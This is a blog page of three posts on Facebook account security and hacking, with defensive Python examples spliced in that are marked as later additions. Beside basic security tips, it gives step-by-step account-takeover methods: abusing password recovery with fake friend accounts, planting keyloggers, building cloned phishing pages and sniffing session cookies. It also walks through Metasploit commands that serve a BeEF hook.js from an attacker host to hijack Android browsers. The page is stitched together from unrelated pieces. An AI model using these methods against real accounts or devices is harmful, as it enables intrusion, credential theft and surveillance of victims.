Friday, 29 July 2016

Protect Your Facebook Account From Hackers 2015

If you type “how to” into Google, the first or second suggestion is usually “how to hack Facebook”. This instant search result tells us that, apparently, many people want to know how Facebook can be hacked.
There are many ways to hack a Facebook account. Some use phishing attacks, some use a keylogger, and the rest rely on common passwords. Either way, it goes without saying how important it is to secure your Facebook account.
Every Facebook account stores so much personal information that it would be a disaster if it went public. Here are some simple steps that will keep your Facebook account secure.

1. Enable Email/SMS Notifications

This is a great way to protect your Facebook account from hackers if you suspect suspicious activity on your account. To set it up, follow these simple steps:
1. Go to Settings > Security > Login Alerts > Edit, enter the details and save the changes.
2. From now on you will get an SMS/email each time you or someone else logs in to your Facebook account.
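To show what a login alert actually decides on, here is an added example (not code from the original post) that replays a few constructed login records and raises an alert when an account is used from a device or country not seen before. The account names, device IDs and country codes are made up, and the first login for each account is assumed to seed the baseline rather than alert.

```python
from collections import defaultdict

# Constructed login records for the example: (account, device_id, country).
# These are not real data.
LOGIN_EVENTS = [
    ("alice", "laptop-1", "IN"),
    ("alice", "laptop-1", "IN"),
    ("alice", "phone-7", "IN"),   # unseen device -> alert
    ("alice", "laptop-1", "RU"),  # known device, unseen country -> alert
    ("bob", "desktop-2", "US"),   # first login for bob seeds the baseline
    ("bob", "desktop-2", "US"),
]

def login_alerts(events):
    """Return one (account, reason, device, country) tuple for every login
    that a 'login alert' feature would notify the owner about.

    Assumption made here: the first login ever seen for an account only seeds
    the known-device / known-country baseline and is not alerted on."""
    seen_devices = defaultdict(set)
    seen_countries = defaultdict(set)
    alerts = []
    for account, device, country in events:
        if account in seen_devices:
            if device not in seen_devices[account]:
                # A new device is the stronger signal, so report it even if the
                # country is new as well.
                alerts.append((account, "new-device", device, country))
            elif country not in seen_countries[account]:
                alerts.append((account, "new-country", device, country))
        seen_devices[account].add(device)
        seen_countries[account].add(country)
    return alerts

def format_alert(alert):
    """Render an alert the way the SMS/email notification would read."""
    account, reason, device, country = alert
    if reason == "new-device":
        return f"{account}: login from a device you have not used before ({device}, {country})"
    return f"{account}: login from a new location ({country}) on {device}"

if __name__ == "__main__":
    for alert in login_alerts(LOGIN_EVENTS):
        print(format_alert(alert))
```

Run as a script it prints the two alerts for alice; bob's repeated logins from the same desktop produce nothing, which is the point of the notification: it only fires for something you have not done before.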

2. Enable Secure Browsing

This is a must for every Facebook user. Follow these steps:
  1. Go to Account Settings
  2. Choose the Security tab
  3. Click on Secure Browsing, as shown above
From now on you will see https://www.facebook.com/ in the address bar instead of http://www.facebook.com/, which means your connection to Facebook is encrypted.

3. Security Question

Set up a good security question that is not easy to guess; not even a close friend should be able to guess it.
What the bad guys do is change your security question. Then, when they want to log in, they click the forgot-password link and use the security question to get into your Facebook account without ever knowing your password.

4. Close Active Sessions

Even if you close your browser without logging out of your Facebook account, you are still considered logged in on that device. I don't know how, but remote hackers can gain access to these sessions and hack your account very easily. So it's always advisable to close your active sessions on a device if you are not planning to log in from it again for a long time.
Go to Security and look for the Active Sessions option.

5. Check For The Url

Example of a fake Facebook login page

Check the URL in the address bar and log in only if it says www.facebook.com. Hackers often use a fake login page (phishing), and when you log in through that page your username and password are sent straight to them.

6. Password

Pick a unique, strong password. Change your Facebook password as often as possible, especially if you find any suspicious activity on your wall, and don't give your username and password to anyone, not even your friends.
Don't share your password with anyone, not even close friends, colleagues or family members.

7. Use Private browser

If you are logging in anywhere other than your home computer, it's better to use private browsing. It won't store your username and password or any other information, and you don't have to worry about signing out; you can just close the window.

8. Stay Updated

Don’t add people you don’t know, especially if the profile seems fake. They are mostly spammers or hackers who can retrieve your personal information.
Don’t trust every third-party Facebook application; some of them might be spam. Use only those which are very popular and can be trusted.
For more info, read the Facebook security page.

What to do if your Facebook account got hacked?

The first thing to do is check whether you can still log in with your password. If yes, change your password immediately, delete all the posts and messages that were posted on your behalf, and then set up the more secure settings shown above.
If you are not able to log in with your old username and password, report the profile as abuse and ask your friends to do the same for you; the more people who report it, the faster that profile will be deleted.
Report to Facebook that your account was hacked at www.facebook.com/hacked/
Always add a secondary email ID to your Facebook account; if you lose access to your account, Facebook will send the password recovery there.

Thursday, 28 July 2016

4 Ways to Crack a Facebook Password & How to Protect Yourself from Them

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into someone's Facebook account.
It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1: Reset the Password

The easiest way to "hack" into someone's Facebook is by resetting the password. This is easier for people who are friends with the person they're trying to hack.
  • The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
  • Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
  • It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
  • It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
  • It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
  • If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.
  • It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

  • Use an email address specifically for your Facebook and don't put that email address on your profile.
  • When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
  • Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.
Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it into your own computer and extracting the data. You can look through Keelog for prices, but it's a bit higher than buying the software since you have to buy the USB drive with the program already on it.

How to Protect Yourself

  • Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
  • Install a password manager. Keyloggers can't steal what you don't type. Password managers automatically fill out important forms without you having to type anything in.
  • Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
  • Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.
The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the Facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

  • Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
  • Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
  • Use anti-virus & web security software, like Norton or McAfee.
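The URL check that both the "Check For The Url" step of the first post and the first bullet above ask the reader to do by eye, written out as an added example (not code from either post). It classifies a login URL and returns a short reason when it should not be trusted; the lookalike addresses in the sample list are constructed for the example and are not real sites.

```python
from urllib.parse import urlsplit

# The one domain the posts tell you to look for.  Subdomains such as
# www.facebook.com or m.facebook.com are accepted; anything else is not.
TRUSTED_DOMAIN = "facebook.com"

def check_login_url(url: str) -> str:
    """Classify a URL you are about to type a Facebook password into.

    Returns "ok" when the page is served over HTTPS from facebook.com or one
    of its subdomains, otherwise a short reason not to trust it."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable"
    # "https://www.facebook.com@evil.example/" puts the real host after the
    # "@"; urlsplit exposes the part before it as username, so refuse it.
    if parts.username is not None or parts.password is not None:
        return "userinfo-in-url"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return "no-host"
    # A lookalike such as www.facebook.com.evil.example or faceb00k.com fails
    # here: the host must be the trusted domain itself or end in ".facebook.com".
    if not (host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN)):
        return "untrusted-host"
    if parts.scheme.lower() != "https":
        return "not-https"
    return "ok"

def is_trusted_login_url(url: str) -> bool:
    return check_login_url(url) == "ok"

# Constructed addresses for the example; the non-Facebook ones are made up.
SAMPLE_URLS = [
    "https://www.facebook.com/login.php",
    "https://m.facebook.com/",
    "http://www.facebook.com/",
    "https://www.facebook.com.evil.example/login.php",
    "https://faceb00k.com/login.php",
    "https://www.facebook.com@evil.example/",
    "https://www.f\u0430cebook.com/",  # Cyrillic 'а' in place of Latin 'a'
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{check_login_url(url):15} {url}")
```

The order of the checks matters: the host is examined before the scheme, so a lookalike host is reported as such even when it is served over HTTPS, and a padlock icon alone is never taken as proof that the page is genuine.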

Method 4: Stealing Cookies

Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.
From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

A Couple More Facebook Hacks

For those with a bit more technical skill, check out the Same Origin Policy Facebook hack and the somewhat easier Facebook Password Extractor. We will continue to add more Facebook hacks in the near future, so keep coming back here.

How to Protect Yourself

  • On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
  • Full-time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
  • Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
  • Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
  • Use a VPN. These protect against any sidejacking from the same Wi-Fi network, no matter what website you're on, as all your network traffic will be encrypted all the way to your VPN provider.
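What "Secure Browsing" (the second step of the first post) and the first bullet above change on the wire is whether the session cookie carries the Secure attribute; without it the browser will also send the cookie on a plain http:// request, which is exactly what a sniffer on open Wi-Fi collects. The following added example (not code from either post) parses Set-Cookie headers and reports cookies that would be exposed that way. The header values are constructed for the example; the HttpOnly check is an extra flag the post does not mention, included because it decides whether script in the page can read the cookie.

```python
def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header value into the cookie name, its value and a
    map of attributes (attribute names lower-cased; bare flags map to True)."""
    pieces = [p.strip() for p in header.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        if not piece:
            continue
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}

def audit_cookie(header: str) -> list:
    """Return the weaknesses of one cookie as short reason strings.

    "no-secure":   the browser will also send it over plain http://, so anyone
                   sniffing an open Wi-Fi network sees it (the Firesheep case).
    "no-httponly": script running in the page can read it, so an injected
                   script can copy it out."""
    cookie = parse_set_cookie(header)
    problems = []
    if "secure" not in cookie["attrs"]:
        problems.append("no-secure")
    if "httponly" not in cookie["attrs"]:
        problems.append("no-httponly")
    return problems

def sniffable_cookies(headers) -> list:
    """Names of cookies, from a list of Set-Cookie header values, that would be
    transmitted in the clear on an http:// request."""
    return [parse_set_cookie(h)["name"] for h in headers
            if "no-secure" in audit_cookie(h)]

# Constructed Set-Cookie headers for the example (names and values made up).
# The first is a session cookie without Secure; the second is the fixed form.
SAMPLE_HEADERS = [
    "session_id=abc123; Path=/; Domain=.example.com; HttpOnly",
    "session_id=abc123; Path=/; Domain=.example.com; Secure; HttpOnly",
    "theme=dark; Path=/; Expires=Wed, 21 Oct 2016 07:28:00 GMT",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(parse_set_cookie(h)["name"], audit_cookie(h) or "ok")
    print("sniffable over http:", sniffable_cookies(SAMPLE_HEADERS))
```

The same audit applies to any site, not only Facebook: a session cookie that lacks Secure undoes an HTTPS-only setting the moment any link or ad loads an http:// resource from the same domain, which is why the bullets above also recommend forcing HTTPS in the browser.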

How to Hack Facebook

This is the initial post of a new series on how to hack Facebook. It's important to note here that each hack I'll be covering is very specific. I have said it before, but I feel I need to repeat it again: there is NO SILVER BULLET that works under all circumstances. Obviously, the good folks at Facebook have taken precautions to make certain that their app is not hacked, but if we are creative, persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them a penny!
If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."
In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place it in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack, to get the password, etc.
In this first entry in this series, we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.

Same Origin Policy

Same-origin policy (SOP) is one of the key security measures that every browser should implement. What it means is that browsers are designed so that script on a web page can't read or modify content that belongs to a different site. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
For those of you who are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.
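The origin comparison the paragraph above describes, as an added example that is not code from the original post: a function that builds the (scheme, host, port) triple a browser compares under the same-origin policy, the read decision a correctly behaving browser makes from it, and, for contrast, a deliberately host-only comparison showing what an inadequate check lets through. The URLs used are constructed; the host-only check is an illustration only and is not a description of the actual Android browser defect, which the post does not detail.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url: str) -> tuple:
    """Return the (scheme, host, port) triple that the same-origin policy
    compares.  A missing port takes the scheme's default, so
    https://www.facebook.com/ and https://www.facebook.com:443/ are one origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme not in DEFAULT_PORTS or not host:
        raise ValueError(f"not an http(s) URL: {url!r}")
    port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    return (scheme, host, port)

def same_origin(a: str, b: str) -> bool:
    """True only if every part of the origin triple matches."""
    return origin(a) == origin(b)

def script_may_read(document_url: str, target_url: str) -> bool:
    """Decision a correctly behaving browser makes when script running in
    document_url tries to read the DOM, cookies or a response of target_url:
    allowed only when the two origins are identical."""
    return same_origin(document_url, target_url)

def host_only_same_origin(a: str, b: str) -> bool:
    """A deliberately inadequate check that compares hostnames only.  Shown
    for contrast (NOT the real Android browser bug): it treats the http:// and
    https:// pages of one host, or the same host on another port, as one origin."""
    return origin(a)[1] == origin(b)[1]

if __name__ == "__main__":
    # Constructed URLs for the example.
    cases = [
        ("https://www.facebook.com/", "https://www.facebook.com/messages"),
        ("https://www.facebook.com/", "http://www.facebook.com/"),
        ("https://www.facebook.com/", "https://m.facebook.com/"),
        ("https://attacker.example/", "https://www.facebook.com/"),
    ]
    for doc, target in cases:
        print(f"{doc} -> {target}: sop={script_may_read(doc, target)} "
              f"host-only={host_only_same_origin(doc, target)}")
```

Note that the scheme is part of the triple: an http:// page of a site is a different origin from its https:// page, which is one more reason the earlier posts tell you to keep Secure Browsing on.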

Step 1: Open Metasploit

Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.

Step 2: Find the Exploit

Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss

Step 3: Get the Info

Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.

Step 4: Show Options

Next, let's see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.

Step 5: Open BeEF

Now, open BeEF. Please take a look at this tutorial on using BeEF if you are unfamiliar with the tool.

Step 6: Set JS to BeEF Hook

Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /

Step 7: Run the Server

Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run

Step 8: Navigate to the Website from an Android Browser

Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP of your web server is.

Step 9: Hook Browser

When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!

Step 10: Detect if the Browser Is Authenticated to Facebook

Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.
We will continue to explore more ways to hack Facebook, Twitter, and Gmail in future articles, so keep coming back, my budding hackers!